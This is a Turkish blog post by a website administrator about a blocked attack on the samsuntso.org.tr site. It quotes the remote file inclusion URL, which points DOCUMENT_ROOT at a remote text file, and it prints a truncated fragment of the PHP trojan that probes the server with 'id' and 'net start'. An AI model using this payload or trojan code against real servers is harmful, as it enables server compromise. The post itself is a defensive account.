www.samsuntso.org.tr Sitesine Yapılan Saldırı Girişimi (PHP/Small.Nac Trojan)

Mavi Marmara saldırısından sonra www.samsuntso.org.tr sitesine İsrail ve Hollandadan gelen yoğun HACK girişimlerinden dolayı farklı bir koruma sistemi yazarak sisteme eklemiştim.

Sistem gelen saldırı taleplerini önce kayıt altına alıyor, sonra engelliyor ve en sonunda da cep telefonuma SMS olarak rapor gönderiyordu, bu sayede aynı kayıt bir çok yerde tutulabiliyor ve saldırılar başladığı andan itibaren kullanılan tüm tekniklerden haberim oluyordu.

sabah 01:34 dolaylarında cep telefonuma bir mesaj geldiği konusunda uyarı aldım.

Gelen mesaj 67.212.66.154 IP adresinden yapılan bir saldırıyı raporluyordu.

Saldırı yöntemi url aracılığı ile yapılıyordu ve  ?_SERVER[DOCUMENT_ROOT]=http://www.labo-….-oire.fr//components/com_artforms/assets/captcha/includes/captchatalk/test.txt?? satırı aracılığı ile sunucuya TROJAN sokmaya çalışıyorlardı.

Dikkat ederseniz _SERVER komutu PHP bünyesinde bulunan ayrılmış komutlar grubundandır ve  [Document_Root] ile sitemin root klasör adresini http://www.labo* ile istedikleri siteye çevirip oradan dosya yükletmekteler.

Ama başarısız olmuşlardı…

Merak edip malum virüsün kodlarını incelemek istedim, merak eden olursa aşağıdadır;

<html><head><title>SysTrojan</title></head>
<body bgcolor=DC143C>
<H1>Wrong Place</H1>
</html></head></body>
<php
if((@eregi("uid",ex("id"))) || 
(@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
...

(Kodların tümünü bilerek yazmadım 🙂 )
Bakalım bu sefer nasıl bir teknikle siteye saldırmayı deneyecekler?

Loading